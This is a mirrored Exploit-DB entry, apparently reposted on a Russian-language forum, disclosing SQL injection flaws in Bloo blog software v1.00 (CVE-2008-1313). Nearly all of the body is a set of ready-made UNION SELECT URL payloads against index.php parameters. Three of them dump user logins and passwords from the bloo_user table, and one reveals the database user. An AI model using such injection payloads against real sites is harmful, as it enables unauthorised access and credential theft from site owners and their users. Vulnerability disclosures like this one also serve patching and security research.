- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5234
- Проверка EDB
-
- Пройдено
- Автор
- MHZ91
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1313
- Дата публикации
- 2008-03-11
Код:
--==+================================================================================+==--
--==+ Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection +==--
--==+================================================================================+==--
Author: MhZ91
Title: Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection
Download: http://sourceforge.net/project/showfiles.php?group_id=160870
Bug: Remote Sql Injection
Info: Bloo is a free, public-domain, object-oriented implementation of full-featured blog software, based on the Phoo Phramework. You can visit the Bloo home wiki at http://outofthebloo.com.
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
Bloo - Object Oriented Blog Software <= v.1.00 present more sql injection...
http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*
etc...
etc...
etc...
I think there are other sql injection in this blog lol
[*]----------------------------------------------------------
# milw0rm.com [2008-03-11]
- Источник
- www.exploit-db.com